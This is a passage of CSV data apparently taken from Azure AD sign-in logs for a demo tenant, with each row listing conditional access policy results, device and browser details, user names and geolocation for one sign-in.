{'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",99476ccd-67d1-454b-a7cf-079ed3851100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,99476ccd-67d1-454b-a7cf-079ed3851100,SigninLogs,Sucess,33.7984581,-84.38828278
+1928,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:56.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8046174b-712f-40d9-9f4e-13cdaefa1000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8046174b-712f-40d9-9f4e-13cdaefa1000,SigninLogs,Sucess,33.0175209,35.44601059
+1929,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:08.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,67c7469f-40d8-0000-4704-adee27fc5bb5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",34a4214f-a676-41f3-9bb4-26faa4980f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,34a4214f-a676-41f3-9bb4-26faa4980f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1930,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,024fdd65-4acf-46c4-8e97-aaced536e2c0,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:10,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Edge 18.1836', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",8533d46a-2775-44a1-99a8-4a97cb421700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8533d46a-2775-44a1-99a8-4a97cb421700,SigninLogs,Sucess,29.4803009,-81.21395111
+1931,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,317e1e4d-933b-439b-9385-7eda13d1e20e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",89223cb6-60af-4a3e-b2e1-947072a21000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,89223cb6-60af-4a3e-b2e1-947072a21000,SigninLogs,Sucess,36.6404686,-78.26995087
+1932,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:39.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,38e617cc-a4b6-4ecc-9b76-c9adca6148e7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93ca542e-4eab-45c4-8608-b715927c1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93ca542e-4eab-45c4-8608-b715927c1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1933,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:03.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3bb4b08-3bf0-41a7-96e5-da755e69f62d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",fd7a6355-56f5-4bc2-9ad4-c259d8770f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,fd7a6355-56f5-4bc2-9ad4-c259d8770f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1934,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:44.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,daed9055-fbab-46c2-a243-813fdcc6e8cc,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",22fd8c7c-75eb-4549-80fa-1727dcad1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,22fd8c7c-75eb-4549-80fa-1727dcad1100,SigninLogs,Sucess,41.90428925,-85.99833679
+1935,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:54.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': 